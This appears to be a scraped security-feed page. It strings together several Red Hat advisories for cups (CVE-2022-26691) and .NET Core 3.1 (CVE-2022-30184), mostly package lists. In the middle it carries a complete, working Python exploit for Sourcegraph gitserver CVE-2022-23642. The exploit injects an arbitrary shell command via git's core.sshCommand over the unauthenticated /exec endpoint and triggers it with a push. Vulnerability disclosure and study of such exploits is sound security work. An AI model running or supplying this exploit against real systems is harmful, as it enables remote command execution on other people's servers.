cups-lpd-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-26691  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqod69zjgjWX9erEAQiQ3A/+LM9m2kXeWz8N2fXRG00WuByQeTpYA3wO  
InBeSzoVT+hb82gPL2BLGVdHQlVfXo/wYN64e33Llkd/X8EEJ139Hn+Unjh0zdUR  
5lL8qmhx3SIujq/F8nHnCsvodBMDtwdbRH70AHrFFlUWYtmyPb5ZmlrUUp/q0gF4  
VQ6oTMRK1RxL71R1ltRAQIu/V/+J8N3j461JSfbI4Y1jzYScChQ2C2p/sKzYJHzn  
qwOHjGqExXDQb0MsSBk3RNreuIlMHU6e4Q6nFNwkJQR6Jfdcwm4iR58i9YAMannx  
/s/OXDn8UoSKqJF4TlD1rMDgWapoKtbtVlRR1fE8BhZ/QUAKPa8ky9HKY+0lSeBu  
xgDuP7UKwFcLV33d1hJd+HgXXj7GspXcrYkE9+VqXAMYh6RVJR/FDpif9kIg3buO  
+yaGEa0wLE4cdykMMk5yDK7dnm59a8GcIZPjLBroC4u2TlTShphoiiyFfjogaPC1  
ZEj2zCLF4nJARYe/m//Sn8Gjg2S/14of7Gr8z1Kehw/0BT+HCzlx/oMh/jJM0PEm  
ExyULWcsmLRrP3VUM8beBCE86Brdq934SpRc8H2QP6Pjj/GxHG9SR6TMZkkMTaNt  
jQcsKd7igS3Q7oEXLNcaNXG31b7eNvWVuJtLL3PMTucSEqSlyXjEXMSDcTrP5aeR  
Zk1KcaJsJpQ=  
=ONyE  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5056-01

Red Hat Security Advisory 2022-5057-01 - The Common UNIX Printing System provides a portable printing layer for Linux, UNIX, and similar operating systems. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: cups security update  
Advisory ID:       RHSA-2022:5057-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5057  
Issue date:        2022-06-15  
CVE Names:         CVE-2022-26691   
=====================================================================

1. Summary:

An update for cups is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

The Common UNIX Printing System (CUPS) provides a portable printing layer  
for Linux, UNIX, and similar operating systems.

Security Fix(es):

* cups: authorization bypass when using "local" authorization  
(CVE-2022-26691)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the cupsd service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2084321 - CVE-2022-26691 cups: authorization bypass when using "local" authorization

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

aarch64:  
cups-2.2.6-38.el8_4.1.aarch64.rpm  
cups-client-2.2.6-38.el8_4.1.aarch64.rpm  
cups-client-debuginfo-2.2.6-38.el8_4.1.aarch64.rpm  
cups-debuginfo-2.2.6-38.el8_4.1.aarch64.rpm  
cups-debugsource-2.2.6-38.el8_4.1.aarch64.rpm  
cups-devel-2.2.6-38.el8_4.1.aarch64.rpm  
cups-ipptool-2.2.6-38.el8_4.1.aarch64.rpm  
cups-ipptool-debuginfo-2.2.6-38.el8_4.1.aarch64.rpm  
cups-libs-debuginfo-2.2.6-38.el8_4.1.aarch64.rpm  
cups-lpd-2.2.6-38.el8_4.1.aarch64.rpm  
cups-lpd-debuginfo-2.2.6-38.el8_4.1.aarch64.rpm

noarch:  
cups-filesystem-2.2.6-38.el8_4.1.noarch.rpm

ppc64le:  
cups-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-client-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-client-debuginfo-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-debuginfo-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-debugsource-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-devel-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-ipptool-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-ipptool-debuginfo-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-libs-debuginfo-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-lpd-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-lpd-debuginfo-2.2.6-38.el8_4.1.ppc64le.rpm

s390x:  
cups-2.2.6-38.el8_4.1.s390x.rpm  
cups-client-2.2.6-38.el8_4.1.s390x.rpm  
cups-client-debuginfo-2.2.6-38.el8_4.1.s390x.rpm  
cups-debuginfo-2.2.6-38.el8_4.1.s390x.rpm  
cups-debugsource-2.2.6-38.el8_4.1.s390x.rpm  
cups-devel-2.2.6-38.el8_4.1.s390x.rpm  
cups-ipptool-2.2.6-38.el8_4.1.s390x.rpm  
cups-ipptool-debuginfo-2.2.6-38.el8_4.1.s390x.rpm  
cups-libs-debuginfo-2.2.6-38.el8_4.1.s390x.rpm  
cups-lpd-2.2.6-38.el8_4.1.s390x.rpm  
cups-lpd-debuginfo-2.2.6-38.el8_4.1.s390x.rpm

x86_64:  
cups-2.2.6-38.el8_4.1.x86_64.rpm  
cups-client-2.2.6-38.el8_4.1.x86_64.rpm  
cups-client-debuginfo-2.2.6-38.el8_4.1.i686.rpm  
cups-client-debuginfo-2.2.6-38.el8_4.1.x86_64.rpm  
cups-debuginfo-2.2.6-38.el8_4.1.i686.rpm  
cups-debuginfo-2.2.6-38.el8_4.1.x86_64.rpm  
cups-debugsource-2.2.6-38.el8_4.1.i686.rpm  
cups-debugsource-2.2.6-38.el8_4.1.x86_64.rpm  
cups-devel-2.2.6-38.el8_4.1.i686.rpm  
cups-devel-2.2.6-38.el8_4.1.x86_64.rpm  
cups-ipptool-2.2.6-38.el8_4.1.x86_64.rpm  
cups-ipptool-debuginfo-2.2.6-38.el8_4.1.i686.rpm  
cups-ipptool-debuginfo-2.2.6-38.el8_4.1.x86_64.rpm  
cups-libs-debuginfo-2.2.6-38.el8_4.1.i686.rpm  
cups-libs-debuginfo-2.2.6-38.el8_4.1.x86_64.rpm  
cups-lpd-2.2.6-38.el8_4.1.x86_64.rpm  
cups-lpd-debuginfo-2.2.6-38.el8_4.1.i686.rpm  
cups-lpd-debuginfo-2.2.6-38.el8_4.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
cups-2.2.6-38.el8_4.1.src.rpm

aarch64:  
cups-client-debuginfo-2.2.6-38.el8_4.1.aarch64.rpm  
cups-debuginfo-2.2.6-38.el8_4.1.aarch64.rpm  
cups-debugsource-2.2.6-38.el8_4.1.aarch64.rpm  
cups-ipptool-debuginfo-2.2.6-38.el8_4.1.aarch64.rpm  
cups-libs-2.2.6-38.el8_4.1.aarch64.rpm  
cups-libs-debuginfo-2.2.6-38.el8_4.1.aarch64.rpm  
cups-lpd-debuginfo-2.2.6-38.el8_4.1.aarch64.rpm

ppc64le:  
cups-client-debuginfo-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-debuginfo-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-debugsource-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-ipptool-debuginfo-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-libs-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-libs-debuginfo-2.2.6-38.el8_4.1.ppc64le.rpm  
cups-lpd-debuginfo-2.2.6-38.el8_4.1.ppc64le.rpm

s390x:  
cups-client-debuginfo-2.2.6-38.el8_4.1.s390x.rpm  
cups-debuginfo-2.2.6-38.el8_4.1.s390x.rpm  
cups-debugsource-2.2.6-38.el8_4.1.s390x.rpm  
cups-ipptool-debuginfo-2.2.6-38.el8_4.1.s390x.rpm  
cups-libs-2.2.6-38.el8_4.1.s390x.rpm  
cups-libs-debuginfo-2.2.6-38.el8_4.1.s390x.rpm  
cups-lpd-debuginfo-2.2.6-38.el8_4.1.s390x.rpm

x86_64:  
cups-client-debuginfo-2.2.6-38.el8_4.1.i686.rpm  
cups-client-debuginfo-2.2.6-38.el8_4.1.x86_64.rpm  
cups-debuginfo-2.2.6-38.el8_4.1.i686.rpm  
cups-debuginfo-2.2.6-38.el8_4.1.x86_64.rpm  
cups-debugsource-2.2.6-38.el8_4.1.i686.rpm  
cups-debugsource-2.2.6-38.el8_4.1.x86_64.rpm  
cups-ipptool-debuginfo-2.2.6-38.el8_4.1.i686.rpm  
cups-ipptool-debuginfo-2.2.6-38.el8_4.1.x86_64.rpm  
cups-libs-2.2.6-38.el8_4.1.i686.rpm  
cups-libs-2.2.6-38.el8_4.1.x86_64.rpm  
cups-libs-debuginfo-2.2.6-38.el8_4.1.i686.rpm  
cups-libs-debuginfo-2.2.6-38.el8_4.1.x86_64.rpm  
cups-lpd-debuginfo-2.2.6-38.el8_4.1.i686.rpm  
cups-lpd-debuginfo-2.2.6-38.el8_4.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-26691  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqod5tzjgjWX9erEAQjjNA//Z7M04b+Nkoijau9PVkZcXty1C50Y+8nY  
s5e/P14N8xsiZNO+LWH1KYwESqyeOlmM6PebeMigm94/xH73vHlJe6ZAuC3FZhe9  
pAYw6xAQXFvysUcqGdgzUk2NB0AXQ6hHlWN5P6/gAMOefxPhApW1L6EhsOBJdX/o  
Ud0yqr2I9TSx12CroJ7TpjqRdrCcb7LbrD1njUlW05MHDk1GgGFCL9Jflvr/ugN3  
YEvQx/7+49a4itSWM6nPhNsJM+MG9O5hyd4bwnbNA1zUJDpSufpqsW8xEhRBqNeA  
kIlfbg9jyb4zPwifxjVJeRFMy+opA9m0L8olMF2Quebz6nJrYRqJVMeD4j/zksy4  
rIktaPI3RTSEVw2ugL1oMvaRNosgpJ4gEumMgFfCgLt/YRlV519jf3HGEevhfUtm  
nU8hFHShWG019bxLt6hwY6cKVB3z2gJHgQeXSbWkOuPL3s2r7rGSrQqDMsJRiZBR  
cTaRDijA52MmUICn6E6THkXrdR0qQGJStl0F7gT8xufcxP+uXiJuD5c8eo29/O8Q  
tXqp+0uAy0VoHz4sT9ZNM06o/zE4sIF6QCLQoc3W3G5Gf+B/FEUPyb5iK84gcqeB  
/Zjxbb54aMOCnVALnMVim7HBoyLc5kYkRb/vDYw6SUFhzDlDSKpftEDQ9Obz+mqG  
VDMNaiW9w24=  
=+Qyt  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5057-01

Sourcegraph Gitserver version 3.36.3 suffers from a remote code execution vulnerability.

    # Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)# Date: 2022-06-10# Exploit Author: Altelus# Vendor Homepage: https://about.sourcegraph.com/# Version: 3.63.3 # Tested on: Linux# CVE : CVE-2022-23642# Docker Container: sourcegraph/server:3.36.3# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service. # This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed # on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible # if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3## Exploitation parameters:# - Exposed Sourcegraph gitserver# - Existing repo on sourcegraphimport jsonimport argparseimport requestsdef exploit(host, existing_git, cmd):    # setting sshCommand    data = {        "Repo" : existing_git,        "Args" : [            "config",            "core.sshCommand",            cmd        ]    }    res = requests.get(host+"/exec", json=data).text    if len(res) > 0:        print("[-] Didn't work: {}".format(res))        exit(0)    # setting fake origin    data = {        "Repo" : existing_git,        "Args" : [            "remote",            "add",            "origin",            "git@lolololz:foo/bar.git"        ]    }    res = requests.get(host+"/exec", json=data).text    if len(res) > 0:        print("[-] Didn't work: {}".format(res))        exit(0)    # triggering command using push    data = {        "Repo" : existing_git,        "Args" : [            "push",            "origin",            "master"        ]    }    res = requests.get(host+"/exec", json=data).text    print("[*] Finished executing exploit")parser = argparse.ArgumentParser()parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")parser.add_argument('--cmd', required=True, help="Command to run")args = parser.parse_args()host = args.gitserver_hostexisting_git = args.existing_gitcmd = args.cmdexploit(host, existing_git, cmd)

Sourcegraph Gitserver 3.36.3 Remote Code Execution

Red Hat Security Advisory 2022-5062-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 3.1.420 and .NET Runtime 3.1.26. Issues addressed include a password leak vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: .NET Core 3.1 on RHEL 7 security and bugfix update  
Advisory ID:       RHSA-2022:5062-01  
Product:           .NET Core on Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5062  
Issue date:        2022-06-15  
CVE Names:         CVE-2022-30184   
=====================================================================

1. Summary:

An update for .NET Core 3.1 is now available for Red Hat Enterprise Linux  
7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
.NET Core on Red Hat Enterprise Linux Server (v. 7) - x86_64  
.NET Core on Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 3.1.420 and .NET Runtime  
3.1.26.

Security Fix(es):

* dotnet: NuGet Credential leak due to loss of control of third party  
symbol server domain (CVE-2022-30184)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2096963 - CVE-2022-30184 dotnet: NuGet Credential leak due to loss of control of third party symbol server domain

6. Package List:

.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
rh-dotnet31-dotnet-3.1.420-1.el7_9.src.rpm

x86_64:  
rh-dotnet31-aspnetcore-runtime-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-debuginfo-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-host-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-hostfxr-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-runtime-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-templates-3.1-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.420-1.el7_9.x86_64.rpm

.NET Core on Red Hat Enterprise Linux Server (v. 7):

Source:  
rh-dotnet31-dotnet-3.1.420-1.el7_9.src.rpm

x86_64:  
rh-dotnet31-aspnetcore-runtime-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-debuginfo-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-host-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-hostfxr-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-runtime-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-templates-3.1-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.420-1.el7_9.x86_64.rpm

.NET Core on Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rh-dotnet31-dotnet-3.1.420-1.el7_9.src.rpm

x86_64:  
rh-dotnet31-aspnetcore-runtime-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-debuginfo-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-host-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-hostfxr-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-runtime-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.26-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-templates-3.1-3.1.420-1.el7_9.x86_64.rpm  
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.420-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-30184  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqod4NzjgjWX9erEAQjh2w/+JJOvWzpGk4HxkwPGAjpa+UpjiFMBY8P8  
rIKPFFkNu//kyF1VGKI/K2tQ1nod0KJMNC6XOqNWyFwAIp3uaAUo3NFVxiEse9pD  
iszm9SKJdmrwNMCkGbxSYqzmMimpfyxXCs9iV2Ta32dhamafzYkNt1c5OgUnOTQR  
RjKuki/h/jGC5M3D2C71KmWOcNLUm1+AKXeMzFVWGT+k7ZzXaxTFweqpd0vUrrtX  
Cj6Pmq6nCODHvFNmKpRAdCqRHzCmRhkd3yYRyMff3uRVOG7rsjRKkXmFN+qVdi32  
kpw8SEaJ8/bTtuf8QKckEda3CUMHPUL564JVjrkAMXaufc/ARhada30gW/DqEDbj  
MTU7R93oyVQ96yS+xoHq3YRszKUOJQdSEvowGcNeSvEGV3VLohVLH66KYotSSCVa  
BSIyK5Jk0+KttVXsJKDoZu+drp/2CLWp8fFXmzaf+LrA7dFtTTEbChzb7EGybAV4  
I69S4pQZaL/xCQLxjs3p6W+leknsQj0ckYk0bJRZ13h2HxFAHusdSqUg0HVgFfhn  
sAsQKesC5dzhQHitgOZLBDbrC3CEkjIT8XtPF/yKB1YrYt7ok3fNkQFped6S/IRA  
zF1s8hmVYZmjB2aED89hqVpCR3zDAHIz+uaWU7AQvSUxM38QLBU2lYNnMYyXFOjW  
qKRzjvpJRks=  
=u8rs  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5062-01

Red Hat Security Advisory 2022-5055-01 - The Common UNIX Printing System provides a portable printing layer for Linux, UNIX, and similar operating systems. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: cups security update  
Advisory ID:       RHSA-2022:5055-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5055  
Issue date:        2022-06-15  
CVE Names:         CVE-2022-26691   
=====================================================================

1. Summary:

An update for cups is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

The Common UNIX Printing System (CUPS) provides a portable printing layer  
for Linux, UNIX, and similar operating systems.

Security Fix(es):

* cups: authorization bypass when using "local" authorization  
(CVE-2022-26691)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the cupsd service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2084321 - CVE-2022-26691 cups: authorization bypass when using "local" authorization

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v. 8.2):

aarch64:  
cups-2.2.6-33.el8_2.1.aarch64.rpm  
cups-client-2.2.6-33.el8_2.1.aarch64.rpm  
cups-client-debuginfo-2.2.6-33.el8_2.1.aarch64.rpm  
cups-debuginfo-2.2.6-33.el8_2.1.aarch64.rpm  
cups-debugsource-2.2.6-33.el8_2.1.aarch64.rpm  
cups-devel-2.2.6-33.el8_2.1.aarch64.rpm  
cups-ipptool-2.2.6-33.el8_2.1.aarch64.rpm  
cups-ipptool-debuginfo-2.2.6-33.el8_2.1.aarch64.rpm  
cups-libs-debuginfo-2.2.6-33.el8_2.1.aarch64.rpm  
cups-lpd-2.2.6-33.el8_2.1.aarch64.rpm  
cups-lpd-debuginfo-2.2.6-33.el8_2.1.aarch64.rpm

noarch:  
cups-filesystem-2.2.6-33.el8_2.1.noarch.rpm

ppc64le:  
cups-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-client-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-client-debuginfo-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-debuginfo-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-debugsource-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-devel-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-ipptool-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-ipptool-debuginfo-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-libs-debuginfo-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-lpd-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-lpd-debuginfo-2.2.6-33.el8_2.1.ppc64le.rpm

s390x:  
cups-2.2.6-33.el8_2.1.s390x.rpm  
cups-client-2.2.6-33.el8_2.1.s390x.rpm  
cups-client-debuginfo-2.2.6-33.el8_2.1.s390x.rpm  
cups-debuginfo-2.2.6-33.el8_2.1.s390x.rpm  
cups-debugsource-2.2.6-33.el8_2.1.s390x.rpm  
cups-devel-2.2.6-33.el8_2.1.s390x.rpm  
cups-ipptool-2.2.6-33.el8_2.1.s390x.rpm  
cups-ipptool-debuginfo-2.2.6-33.el8_2.1.s390x.rpm  
cups-libs-debuginfo-2.2.6-33.el8_2.1.s390x.rpm  
cups-lpd-2.2.6-33.el8_2.1.s390x.rpm  
cups-lpd-debuginfo-2.2.6-33.el8_2.1.s390x.rpm

x86_64:  
cups-2.2.6-33.el8_2.1.x86_64.rpm  
cups-client-2.2.6-33.el8_2.1.x86_64.rpm  
cups-client-debuginfo-2.2.6-33.el8_2.1.i686.rpm  
cups-client-debuginfo-2.2.6-33.el8_2.1.x86_64.rpm  
cups-debuginfo-2.2.6-33.el8_2.1.i686.rpm  
cups-debuginfo-2.2.6-33.el8_2.1.x86_64.rpm  
cups-debugsource-2.2.6-33.el8_2.1.i686.rpm  
cups-debugsource-2.2.6-33.el8_2.1.x86_64.rpm  
cups-devel-2.2.6-33.el8_2.1.i686.rpm  
cups-devel-2.2.6-33.el8_2.1.x86_64.rpm  
cups-ipptool-2.2.6-33.el8_2.1.x86_64.rpm  
cups-ipptool-debuginfo-2.2.6-33.el8_2.1.i686.rpm  
cups-ipptool-debuginfo-2.2.6-33.el8_2.1.x86_64.rpm  
cups-libs-debuginfo-2.2.6-33.el8_2.1.i686.rpm  
cups-libs-debuginfo-2.2.6-33.el8_2.1.x86_64.rpm  
cups-lpd-2.2.6-33.el8_2.1.x86_64.rpm  
cups-lpd-debuginfo-2.2.6-33.el8_2.1.i686.rpm  
cups-lpd-debuginfo-2.2.6-33.el8_2.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v. 8.2):

Source:  
cups-2.2.6-33.el8_2.1.src.rpm

aarch64:  
cups-client-debuginfo-2.2.6-33.el8_2.1.aarch64.rpm  
cups-debuginfo-2.2.6-33.el8_2.1.aarch64.rpm  
cups-debugsource-2.2.6-33.el8_2.1.aarch64.rpm  
cups-ipptool-debuginfo-2.2.6-33.el8_2.1.aarch64.rpm  
cups-libs-2.2.6-33.el8_2.1.aarch64.rpm  
cups-libs-debuginfo-2.2.6-33.el8_2.1.aarch64.rpm  
cups-lpd-debuginfo-2.2.6-33.el8_2.1.aarch64.rpm

ppc64le:  
cups-client-debuginfo-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-debuginfo-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-debugsource-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-ipptool-debuginfo-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-libs-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-libs-debuginfo-2.2.6-33.el8_2.1.ppc64le.rpm  
cups-lpd-debuginfo-2.2.6-33.el8_2.1.ppc64le.rpm

s390x:  
cups-client-debuginfo-2.2.6-33.el8_2.1.s390x.rpm  
cups-debuginfo-2.2.6-33.el8_2.1.s390x.rpm  
cups-debugsource-2.2.6-33.el8_2.1.s390x.rpm  
cups-ipptool-debuginfo-2.2.6-33.el8_2.1.s390x.rpm  
cups-libs-2.2.6-33.el8_2.1.s390x.rpm  
cups-libs-debuginfo-2.2.6-33.el8_2.1.s390x.rpm  
cups-lpd-debuginfo-2.2.6-33.el8_2.1.s390x.rpm

x86_64:  
cups-client-debuginfo-2.2.6-33.el8_2.1.i686.rpm  
cups-client-debuginfo-2.2.6-33.el8_2.1.x86_64.rpm  
cups-debuginfo-2.2.6-33.el8_2.1.i686.rpm  
cups-debuginfo-2.2.6-33.el8_2.1.x86_64.rpm  
cups-debugsource-2.2.6-33.el8_2.1.i686.rpm  
cups-debugsource-2.2.6-33.el8_2.1.x86_64.rpm  
cups-ipptool-debuginfo-2.2.6-33.el8_2.1.i686.rpm  
cups-ipptool-debuginfo-2.2.6-33.el8_2.1.x86_64.rpm  
cups-libs-2.2.6-33.el8_2.1.i686.rpm  
cups-libs-2.2.6-33.el8_2.1.x86_64.rpm  
cups-libs-debuginfo-2.2.6-33.el8_2.1.i686.rpm  
cups-libs-debuginfo-2.2.6-33.el8_2.1.x86_64.rpm  
cups-lpd-debuginfo-2.2.6-33.el8_2.1.i686.rpm  
cups-lpd-debuginfo-2.2.6-33.el8_2.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-26691  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

